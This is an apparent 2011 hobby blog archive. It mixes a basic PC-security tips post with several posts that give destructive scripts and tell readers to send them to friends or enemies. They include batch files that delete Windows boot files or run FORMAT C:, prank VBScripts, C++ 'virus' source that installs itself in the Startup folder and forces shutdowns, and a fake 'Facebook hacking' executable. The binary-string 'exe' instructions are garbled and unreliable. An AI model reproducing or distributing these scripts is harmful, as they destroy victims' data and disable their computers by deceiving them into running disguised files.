Friday, September 30, 2011

7 Tips to improve your PC Security


7 Tips to improve your PC Security




Hello Friends, today i will explain you how to secure your computer by just simple 7 steps. This will help you to protect your computer from viruses, Trojan attacks and also from hackers. These 7 tips will improve your computer and online security. Online Computer and internet security is critical right from the moment you switch on your brand new computer or start your internet for the very first time. Here are 7 Simple Steps to improve your PC security.

online PC security, improve PC security
7 Tips to improve your PC security


7 Tips to improve your PC security

1. Install anti-virus and anti-spyware software.
Install Anti-virus and Anti-spyware software on your computer before you start surfing the first time. The difference between a computer virus and spyware is that - a virus is a malicious piece of computer code that can be implanted on any computer and it can result in destruction of the file systems of your computer and can be transferred from one computer to another and spread like the biological virus. A spyware is a program that collects information about you without your knowledge or consent. A spyware does not spread like a virus.

2. Keep your computer firewall ON all the time
Most anti-virus soft wares come with a firewall. If the operating system that you are using is Microsoft Windows XP Service Pack 2 (SP2) or Macintosh OS X, then it has an in-built firewall. Usually, the firewall is off when the computer is shipped to you, so make you read instructions on how to turn on the firewall. A firewall prevents direct communication between your computer and another computer (a hacker's computer).

3. Turn on the automatic software updates feature
Turn on the automatic updates feature of your anti-virus, anti-spyware, OS, and firewall on and stay current. This is a good online computer security measure. It is important that you have the most current protection. Hackers search on the internet for computers that are either unprotected or don't have the latest protection features. Hackers can hack into your computer and install software on your computer. This will enable them to steal login details of your online bank accounts, other membership sites like Ebay, Paypal etc. and also send Spam emails that appear to originate from your computer. Sending Spam emails that appear to originate from your email address can result in your account being revoked!

4. Store your computer information safely
Storing your computer information safely can help the technician who is fixing/ restoring your computer. For example, on Windows, Click Start and then choose Run. This will bring up small window wherein you need to type ‘msinfo32' without the quotes. This will bring up a system window. On this widow, choose the file menu and then Export. Export your system information on to a CD. Similarly, for other operating systems, search on Google.com for information on storing the system information on a CD.

5. Backup important files
It is important to back up important files. Determine what you would do to restore your computer if it has been attacked. Pretend that your computer file system has been corrupted and then what steps would you take to restore. You will realize that having a backup can make things easy for you.

6. Use strong password authentication
When you signup for an online membership like online bank, , Paypal, Ebay etc., do not use weak passwords that can make it easy for people who know you or have your some information about, easy to hack. Using your significant other's name, child's name, pet's name etc. are weak. Use something stronger like first letters of the address of the house where you were born concatenated to your birth year or something along those lines. It is best if the password is NOT some meaningful word!

7. Protect your personal information
If you are asked to give out personal information like phone number, address, SSN, identification numbers etc. on the internet, use more caution. Find out exactly why and how they will be used. If there is a link in your email that asks you to login by clicking on the link, then don't! Usually genuine emails don't ask you to login directly by clicking a link in the email. If you want to login to your membership accounts, always open a new browser and then type the URL of the website (to login to Paypal account, type paypal.com on the new browser instead of clicking on the link from an email that is asking you to login.).
If you are giving out credit card information, then the page that accepts credit card information must have secure encryption. The URL usually begins with https instead of the regular http. If you right click and select properties, the Connection section should read something like 128 bit encryption (High) and also must have 1024 bit exchange.

Following these 7 steps to online computer security can protect you and your computer from online attacks.
I hope you all like this post. If you like it please comment..


Sunday, September 25, 2011

10 most dangerous vbscript {warning dont try}

10 most dangerous vbscript

1) Convey a little message and shut down
the computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Save it as "Anything.BAT" in All Files and
send it.

2) Toggle the Caps Lock button
simultaneously:
Type :
Set wshShell =wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

3) Continually pop out the CD Drive. If there
are more than one, it pops out all of them!
Type :
Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.

4) Frustrate someone by making this
VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how
are you? I am good thanks" after some time
of clicking the file and freak someone out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.

6) Frustrate someone by making this
VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.

7) Hack the keyboard and make it type "You
are a fool" continuously:
Type :
Set wshShell = wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your
friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file.
It asks your friend to choose a number
between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your
actions. Beyond this point it is you that has
the power to kill yourself. If you press 'x'
then your PC will be formatted. Do not
come crying to me when you fried your
computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.

Be careful use at ur own risk

Friday, September 23, 2011

how to Crashing a PC forever

Crashing a PC forever


Want a revenge!!! Do this on the your
Enemy's PC 3-) 3-)
How to crash a PC Forever :::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that.
Save it as a .bat file.
This should shutdown the persons
computer. It shuts it off once and deletes
the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for
the idiots)
**Also remember this might not work with
vista.**

Thursday, September 22, 2011

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix... and this is only for educational purpose

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;

3-save it as matrix.bat
4-finish

warning;- plz dont open in ur copmuter







Tuesday, September 20, 2011

FORMAT your friend's hardDisk forever.

FORMAT your friend's hardDisk
forever.
..
STEPS TO FOLLOW:--
1. Write/copy the following code in
notepad :

... 100101100011111001001010101010
10100000111111 00000

2. Save As it as .EXE and any Name
would Do. eg- (hackfb.exe)

3.Then send it to your friend in pen
... drive to say him/her as guide of
hacking Facebook.

3. If u run the program means it will
format the Hard Drive.

*NOTE: This is for educative purposes
only!!
WARNING - DON'T OPEN THIS FILE ON YOUR COMPUTER

Sunday, September 18, 2011

How to destroy any computer

How to destroy any computer
part

1.Open notepad

2.write this command
FORMAT C:
... 3.save it as name of Mr.F.bat
send any one one

WARINING::::::::::::::
But most important never OPEN
it in your computer
EnJOY

Tuesday, September 13, 2011

how to Crash Anyones Computer


hi frndzz Crash Anyones Computer

This is intended as a joke and for educational use the purpose of this is not to remove everything from their desktop but to just crash their computer and scare them a little bit.
Ok. So guyz open up notepad and

Friday, September 9, 2011

Restart your friend's phone

Restart your friend's phone

using smsThis is
a featured page
Here is a new trick to restart ur friends
mobile via sms
with this trick only
1110,1110i,1112,1100,2100 can be
restarted.
just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
or 79 inverted commas
in text msg and send it to ur friend having
cells mention above and see wat happens

Thursday, September 8, 2011

how To create one such talk script

To create one such talk script, follow the


steps given below:-
Steps
1--> Open Notepad.
2--> Copy and paste the exact code given
below::
Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
3--> Click on File Menu, Save As, select All
Types in Save as Type option, and save the
file as Speak.vbs or "*.vbs

LIKE ON FACEBOOK